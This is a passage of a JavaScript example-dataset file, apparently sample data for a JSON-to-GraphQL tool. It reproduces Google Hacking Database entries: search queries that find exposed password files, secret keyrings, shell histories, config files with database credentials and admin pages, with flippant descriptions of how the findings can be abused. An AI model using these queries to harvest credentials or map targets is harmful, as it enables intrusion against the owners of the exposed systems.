graphql-engine/community/tools/json2graphql/example-datasets/random.js

// This database has been taken from https://github.com/0xBEAF/GHDB-in-json

const db = {
  "data": [{"short description": "squid cache server reports", "long description": "These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH*  unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing.", "submited": "2003-06-24", "request": "\"cacheserverreport for\" \"This analysis was produced by calamaris\"", "id": 1}, {"short description": "Ganglia Cluster Reports", "long description": "These are server cluster reports, great for info gathering. Lesse, what were those server names again?", "submited": "2003-06-24", "request": "intitle:\"Ganglia\" \"Cluster Report for\"", "id": 2}, {"short description": "ICQ chat logs, please...", "long description": "ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. On purpose?", "submited": "2003-06-24", "request": "intitle:\"Index of\" dbconvert.exe chats", "id": 3}, {"short description": "Apache online documentation", "long description": "When you install the Apache web server, you get a nice set of online documentation. When you learn how to use Apache, your supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?", "submited": "2003-06-24", "request": "intitle:\"Apache HTTP Server\" intitle:\"documentation\"", "id": 4}, {"short description": "Coldfusion Error Pages", "long description": "These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having \"technical difficulties.\" The resulting cached error message gives lots of juicy tidbits about the target site.", "submited": "2003-06-24", "request": "\"Error Diagnostic Information\" intitle:\"Error Occurred While\"", "id": 5}, {"short description": "Financial spreadsheets: finance.xls", "long description": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\"", "submited": "2003-06-24", "request": "intitle:\"Index of\" finance.xls", "id": 6}, {"short description": "Financial spreadsheets: finances.xls", "long description": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\"", "submited": "2003-06-24", "request": "intitle:index.of finances.xls", "id": 7}, {"short description": "sQL data dumps", "long description": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper.....", "submited": "2003-06-24", "request": "\"# Dumping data for table\"", "id": 8}, {"short description": "bash_history files", "long description": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations...", "submited": "2003-06-24", "request": "intitle:index.of .bash_history", "id": 9}, {"short description": "sh_history files", "long description": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations...", "submited": "2003-06-24", "request": "intitle:index.of .sh_history", "id": 10}, {"short description": "mysql history files", "long description": "The .mysql_history file contains commands that were performed against a mysql database. A \"history\" of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS...", "submited": "2003-06-24", "request": "intitle:\"Index of\" .mysql_history", "id": 11}, {"short description": "mt-db-pass.cgi files", "long description": "These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs...", "submited": "2003-06-24", "request": "intitle:index.of mt-db-pass.cgi", "id": 12}, {"short description": "Windows 2000 Internet Services", "long description": "At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: \"Any users attempting to connect to this site are currently receiving an 'Under Construction page'\" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature...", "submited": "2003-06-24", "request": "intitle:\"Welcome to Windows 2000 Internet Services\"", "id": 13}, {"short description": "IIS 4.0", "long description": "Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of \"Welcome to IIS 4.0\" we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well. Old code: FREE with operating system.Poor content management: an average of $40/hour. Factory-installed default scripts: FREE with operating system.Getting hacked by a script kiddie that found you on Google: PRICELESS.For all the things money can't buy, there's a googleDork award.", "submited": "2003-06-24", "request": "intitle:\"Welcome to IIS 4.0\"", "id": 14}, {"short description": "Look in my backup directories! Please?", "long description": "Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What.s in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for \"best security practices,\" winning this site the Top GoogleDork award for this category.", "submited": "2003-06-24", "request": "\"Index of /backup\"", "id": 15}, {"short description": "OpenBSD running Apache", "long description": "I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo back in the day.Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they.ve patched their sites already. Then again, they may just show up on zone-h..", "submited": "2003-06-24", "request": "\"powered by openbsd\" +\"powered by apache\"", "id": 16}, {"short description": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", "long description": "PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is except googleDorks. GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should noever be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude.", "submited": "2003-06-24", "request": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", "id": 17}, {"short description": "people.lst", "long description": "*sigh*", "submited": "2003-06-24", "request": "intitle:index.of people.lst", "id": 18}, {"short description": "passwd", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:index.of passwd passwd.bak", "id": 19}, {"short description": "master.passwd", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"master.passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!For master.passwd, be sure to check other files in the same directory...", "submited": "2003-06-24", "request": "intitle:index.of master.passwd", "id": 20}, {"short description": "pwd.db", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The his in this search show \"pwd.db\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of\" pwd.db", "id": 21}, {"short description": "htpasswd / htpasswd.bak", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of\" \".htpasswd\" htpasswd.bak", "id": 22}, {"short description": "htpasswd / htgroup", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!You'll need to sift through these results a bit...", "submited": "2003-06-24", "request": "intitle:\"Index of\" \".htpasswd\" \"htgroup\"  -intitle:\"dist\" -apache -htpasswd.c", "id": 23}, {"short description": "spwd.db / passwd", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of\" spwd.db passwd -pam.conf", "id": 24}, {"short description": "passwd / etc (reliable)", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of..etc\" passwd", "id": 25}, {"short description": "AIM buddy lists", "long description": "These searches bring up common names for AOL Instant Messenger \"buddylists\". These lists contain screen names of your \"online buddies\" in Instant Messenger. Not that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The thing that's interesting are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. This is really for the peepers out there, and it' possible to spend countless hours rifling through people's personal crap. Also try buddylist.blt, buddy.blt, buddies.blt.", "submited": "2003-06-24", "request": "buddylist.blt", "id": 26}, {"short description": "config.php", "long description": "This search brings up sites with \"config.php\" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!!", "submited": "2003-06-24", "request": "intitle:index.of config.php", "id": 27}, {"short description": "phpinfo()", "long description": "this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks \"joe!\" =)", "submited": "2004-11-18", "request": "intitle:phpinfo \"PHP Version\"", "id": 28}, {"short description": "MYSQL error message: supplied argument....", "long description": "One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential \"crawling\" activities.", "submited": "2003-06-24", "request": "\"supplied argument is not a valid MySQL result resource\"", "id": 29}, {"short description": "The Master List", "long description": "CLick on any of the following links to show google's list!_vti_inf.html (694 hits)service.pwd (11,800 hits)users.pwd (23 hits)authors.pwd (22 hits)administrators.pwd (22 hits)shtml.dll (780 hits)shtml.exe (761 hits)fpcount.exe (1,370 hits)default.asp (2,170 hits)showcode.asp (4 hits)sendmail.cfm (5 hits)getFile.cfm (7 hits)imagemap.exe (510 hits)test.bat (353 hits)msadcs.dll (8 hits)htimage.exe (513 hits)counter.exe (164 hits)browser.inc (11 hits)hello.bat (18 hits)default.asp\\\\ (2,170 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)cart32.exe (9 hits)add.exe (38 hits)index.JSP (998 hits)index.jsp (998 hits)SessionServlet (46 hits)shtml.dll (780 hits)index.cfm (473 hits)page.cfm (5 hits)shtml.exe (761 hits)web_store.cgi (16 hits)shop.cgi (63 hits)upload.asp (27 hits)default.asp (2,170 hits)pbserver.dll (6 hits)phf (370 hits)test-cgi (1,560 hits)finger (23,900 hits)Count.cgi (8,710 hits)jj (5,600 hits)php.cgi (170 hits)php (48,000 hits)nph-test-cgi (132 hits)handler (9,220 hits)webdist.cgi (35 hits)webgais (37 hits)websendmail (12 hits)faxsurvey (27 hits)htmlscript (50 hits)perl.exe (340 hits)wwwboard.pl (455 hits)www-sql (26,500 hits)view-source (641 hits)campas (94 hits)aglimpse (12 hits)glimpse (4,530 hits)man.sh (127 hits)AT-admin.cgi (789 hits)AT-generate.cgi (14 hits)filemail.pl (5 hits)maillist.pl (16 hits)info2www (737 hits)files.pl (267 hits)bnbform.cgi (91 hits)survey.cgi (93 hits)classifieds.cgi (25 hits)wrap (14,000 hits)cgiwrap (1,270 hits)edit.pl (114 hits)perl (80,700 hits)names.nsf (12 hits)webgais (37 hits)dumpenv.pl (7 hits)test.cgi (1,560 hits)submit.cgi (79 hits)submit.cgi (79 hits)guestbook.cgi (528 hits)guestbook.pl (451 hits)cachemgr.cgi (25 hits)responder.cgi (4 hits)perlshop.cgi (30 hits)query (15,500 hits)w3-msql (877 hits)plusmail (12 hits)htsearch (177 hits)infosrch.cgi (19 hits)publisher (2,610 hits)ultraboard.cgi (24 hits)db.cgi (96 hits)formmail.cgi (420 hits)allmanage.pl (5 hits)ssi (9,550 hits)adpassword.txt (39 hits)redirect.cgi (60 hits)f (124,000 hits)cvsweb.cgi (78 hits)login.jsp (241 hits)login.jsp (241 hits)dbconnect.inc (18 hits)admin (57,000 hits)htgrep (30 hits)wais.pl (133 hits)amadmin.pl (14 hits)subscribe.pl (65 hits)news.cgi (387 hits)auctionweaver.pl (2 hits).htpasswd (2,390 hits)acid_main.php (3 hits)access_log (1,250 hits)access-log (618 hits)access.log (618 hits)log.htm (386 hits)log.html (1,310 hits)log.txt (987 hits)logfile (23,200 hits)logfile.htm (76 hits)logfile.html (671 hits)logfile.txt (701 hits)logger.html (37 hits)stat.htm (398 hits)stats.htm (687 hits)stats.html (1,840 hits)stats.txt (342 hits)webaccess.htm (11 hits)wwwstats.html (80 hits)source.asp (11 hits)perl (80,700 hits)mailto.cgi (46 hits)YaBB.pl (35 hits)mailform.pl (670 hits)cached_feed.cgi (6 hits)cr (27,500 hits)global.cgi (14 hits)Search.pl (548 hits)build.cgi (74 hits)common.php (184 hits)common.php (184 hits)show (33,500 hits)global.inc (114 hits)ad.cgi (21 hits)WSFTP.LOG (11 hits)index.html~ (81,100 hits)index.php~ (6,740 hits)index.html.bak (690 hits)index.php.bak (69 hits)print.cgi (61 hits)register.cgi (172 hits)webdriver (35 hits)bbs_forum.cgi (45 hits)mysql.class (21 hits)sendmail.inc (97 hits)CrazyWWWBoard.cgi (68 hits)search.pl (548 hits)way-board.cgi (44 hits)webpage.cgi (89 hits)pwd.dat (22 hits)adcycle (12 hits)post-query (240 hits)help.cgi (69 hits)", "submited": "2003-06-24", "request": "", "id": 30}, {"short description": "robots.txt", "long description": "The robots.txt file contains \"rules\" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff.However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!", "submited": "2003-06-27", "request": "intitle:index.of robots.txt", "id": 31}, {"short description": "passlist", "long description": "I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?*sigh*Supreme googledorkage", "submited": "2003-06-27", "request": "index.of passlist", "id": 32}, {"short description": "secret", "long description": "What kinds of goodies lurk in directories marked as \"secret?\" Find out...", "submited": "2003-06-27", "request": "index.of.secret", "id": 33}, {"short description": "private", "long description": "What kinds of things might you find in directories marked \"private?\" let's find out....", "submited": "2003-06-27", "request": "index.of.private", "id": 34}, {"short description": "etc (index.of)", "long description": "This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!", "submited": "2003-06-27", "request": "index.of.etc", "id": 35}, {"short description": "winnt", "long description": "The \\WINNT directory is the directory that Windows NT is installed into by default. Now just because google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Wither way, worthy of a nomination.", "submited": "2003-06-27", "request": "index.of.winnt", "id": 36}, {"short description": "secure", "long description": "What could be hiding in directories marked as \"secure?\" let's find out...", "submited": "2003-06-27", "request": "index.of.secure", "id": 37}, {"short description": "protected", "long description": "What could be in a directory marked as \"protected?\" Let's find out...", "submited": "2003-06-27", "request": "index.of.protected", "id": 38}, {"short description": "index.of.password", "long description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...", "submited": "2003-06-27", "request": "index.of.password", "id": 39}, {"short description": "\"This report was generated by WebLog\"", "long description": "These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a schmorgasbord! =P", "submited": "2003-06-27", "request": "\"This report was generated by WebLog\"", "id": 40}, {"short description": "\"produced by getstats\"", "long description": "Another web statistics package. This one originated from a google scan of an ivy league college. *sigh*There's sooo much stuff in here!", "submited": "2003-06-30", "request": "\"These statistics were produced by getstats\"", "id": 41}, {"short description": "\"generated by wwwstat\"", "long description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots os good stuff.You know, these are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...thanks, sac =)", "submited": "2003-06-30", "request": "\"This summary was generated by wwwstat\"", "id": 42}, {"short description": "haccess.ctl (one way)", "long description": "this is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. nice find.", "submited": "2003-06-30", "request": "intitle:index.of haccess.ctl", "id": 43}, {"short description": "haccess.ctl (VERY reliable)", "long description": "haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file decribes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =PThis method is very reliable due to the use of this google query:filetype:ctl BasicThis pulls out the file by name then searches for a string inside of it (Basic) which appears in the standard template for this file.", "submited": "2003-06-30", "request": "filetype:ctl Basic", "id": 44}, {"short description": "filetype:xls username password email", "long description": "This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank \"template\" forms to weed through, but you can tell from the Google summary that some of these are winners... err losers.. depending on your perspective.", "submited": "2003-06-30", "request": "filetype:xls username password email", "id": 45}, {"short description": "Hassan Consulting's Shopping Cart Version 1.18", "long description": "These servers can be messed with in many ways. One specific way is by way of the \"../\" bug. This lets you cruise around the web server in a somewhat limited fashion.", "submited": "2003-07-08", "request": "inurl:shop \"Hassan Consulting&#039;s Shopping Cart Version 1.18\"", "id": 46}, {"short description": "site:edu admin grades", "long description": "I never really thought about this until I started coming up with juicy examples for DEFCON 11.. A few GLARINGLY bad examples contain not only student grades and names, but also social security numbers, securing the highest of all googledork ratings!", "submited": "2003-07-10", "request": "site:edu admin grades", "id": 47}, {"short description": "auth_user_file.txt", "long description": "DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)", "submited": "2003-07-11", "request": "allinurl:auth_user_file.txt", "id": 48}, {"short description": "inurl:config.php dbuname dbpass", "long description": "The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!The hishest of all googledorks ratings!", "submited": "2003-07-29", "request": "inurl:config.php dbuname dbpass", "id": 49}, {"short description": "inurl:tech-support inurl:show Cisco", "long description": "This is a way to find Cisco products with an open web interface. These are generally supposed to be user and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. Also, there are very few results (2 at the time of posting.)", "submited": "2003-08-07", "request": "inurl:tech-support inurl:show Cisco", "id": 50}, {"short description": "index_i.shtml Ready (Xerox printers on the web!)", "long description": "These printers are not-only web-enabled, but their management interface somehow got crawled by google! These puppies should not be public! You can really muck with these printers. In some cases, going to the \"password.shtml\" page, you can even lock out the admins if a username and password has not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)", "submited": "2003-08-11", "request": "i_index.shtml Ready", "id": 51}, {"short description": "aboutprinter.shtml (More Xerox printers on the web!)", "long description": "More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not.", "submited": "2003-08-11", "request": "aboutprinter.shtml", "id": 52}, {"short description": "\"Chatologica MetaSearch\" \"stack tracking\"", "long description": "There is soo much crap in this error message... Apache version, CGI environment vars, path names, stack-freaking-dumps, process ID's, perl version, yadda yadda yadda...", "submited": "2003-08-15", "request": "\"Chatologica MetaSearch\" \"stack tracking:\"", "id": 53}, {"short description": "mystuff.xml - Trillian data files", "long description": "This particular file contains web links that trillian users have entered into the tool. Trillian combines many different messaging programs into one tool. AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here!", "submited": "2003-08-19", "request": "intitle:index.of mystuff.xml", "id": 54}, {"short description": "trillian.ini", "long description": "Trillian pulls together all sort of messaging clients like AIM MSN, Yahoo, IRC, ICQ, etc. The various ini files that trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks!", "submited": "2003-08-19", "request": "intitle:index.of trillian.ini", "id": 55}, {"short description": "intitle:admin intitle:login", "long description": "Admin Login pages. Now, the existance of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke.", "submited": "2003-09-09", "request": "intitle:admin intitle:login", "id": 56}, {"short description": "ORA-00921: unexpected end of SQL command", "long description": "Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames.", "submited": "2004-01-09", "request": "\"ORA-00921: unexpected end of SQL command\"", "id": 57}, {"short description": "passlist.txt (a better way)", "long description": "Cleartext passwords. No decryption required!", "submited": "2004-01-23", "request": "inurl:passlist.txt", "id": 58}, {"short description": "sitebuildercontent", "long description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?", "submited": "2004-03-04", "request": "inurl:sitebuildercontent", "id": 59}, {"short description": "sitebuilderfiles", "long description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?", "submited": "2004-03-04", "request": "inurl:sitebuilderfiles", "id": 60}, {"short description": "sitebuilderpictures", "long description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?", "submited": "2004-03-04", "request": "inurl:sitebuilderpictures", "id": 61}, {"short description": "htpasswd", "long description": "This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*", "submited": "2004-03-04", "request": "filetype:htpasswd htpasswd", "id": 62}, {"short description": "\"YaBB SE Dev Team\"", "long description": "Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contain an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674for more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.", "submited": "2004-03-04", "request": "\"YaBB SE Dev Team\"", "id": 63}, {"short description": "EarlyImpact Productcart", "long description": "The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.", "submited": "2004-03-04", "request": "inurl:custva.asp", "id": 64}, {"short description": "mnGoSearch vulnerability", "long description": "According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allow an attacker to execute commands on the server.", "submited": "2004-03-04", "request": "\"Powered by mnoGoSearch - free web search engine software\"", "id": 65}, {"short description": "IIS 4.0 error messages", "long description": "IIS 4.0 servers. Extrememly old, incredibly easy to hack...", "submited": "2004-03-04", "request": "intitle:\"the page cannot be found\" inetmgr", "id": 66}, {"short description": "Windows 2000 web server error messages", "long description": "Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box...", "submited": "2004-03-04", "request": "intitle:\"the page cannot be found\" \"2004 microsoft corporation\"", "id": 67}, {"short description": "IIS web server error messages", "long description": "This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into...", "submited": "2004-03-04", "request": "intitle:\"the page cannot be found\" \"internet information services\"", "id": 68}, {"short description": "phpMyAdmin dumps", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information...", "submited": "2004-03-04", "request": "\"# phpMyAdmin MySQL-Dump\" filetype:txt", "id": 69}, {"short description": "phpMyAdmin dumps", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information...", "submited": "2004-03-04", "request": "\"# phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"", "id": 70}, {"short description": "Gallery in configuration mode", "long description": "Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that!", "submited": "2004-03-04", "request": "intitle:\"Gallery in Configuration mode\"", "id": 71}, {"short description": "cgiirc.conf", "long description": "CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!", "submited": "2004-03-04", "request": "intitle:index.of cgiirc.config", "id": 72}, {"short description": "cgiirc.conf", "long description": "This is another less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!", "submited": "2004-03-04", "request": "inurl:cgiirc.config", "id": 73}, {"short description": "ipsec.secrets", "long description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!", "submited": "2004-03-04", "request": "inurl:ipsec.secrets -history -bugs", "id": 74}, {"short description": "ipsec.secrets", "long description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!", "submited": "2004-03-04", "request": "inurl:ipsec.secrets \"holds shared secrets\"", "id": 75}, {"short description": "ipsec.conf", "long description": "The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting....", "submited": "2004-03-04", "request": "inurl:ipsec.conf -intitle:manpage", "id": 76}, {"short description": "Internal Server Error", "long description": "This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted.", "submited": "2004-03-04", "request": "intitle:\"500 Internal Server Error\" \"server at\"", "id": 77}, {"short description": "mysql error with query", "long description": "Another error message, this appears when an SQL query bails. This is a generic mySQL message, so there's all sort of information hackers can use, depending on the actual error message...", "submited": "2004-03-04", "request": "\"mySQL error with query\"", "id": 78}, {"short description": "sQL syntax error", "long description": "Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"You have an error in your SQL syntax near\"", "id": 79}, {"short description": "\"Supplied argument is not a valid MySQL result resource\"", "long description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Supplied argument is not a valid MySQL result resource\"", "id": 80}, {"short description": "ORA-00936: missing expression", "long description": "A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"ORA-00936: missing expression\"", "id": 81}, {"short description": "ORA-00921: unexpected end of SQL command", "long description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"ORA-00921: unexpected end of SQL command\"", "id": 82}, {"short description": "\"ORA-00933: SQL command not properly ended\"", "long description": "An Oracle error message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"ORA-00933: SQL command not properly ended\"", "id": 83}, {"short description": "\"Unclosed quotation mark before the character string\"", "long description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Unclosed quotation mark before the character string\"", "id": 84}, {"short description": "\"Incorrect syntax near\"", "long description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Incorrect syntax near\"", "id": 85}, {"short description": "\"Incorrect syntax near\"", "long description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all 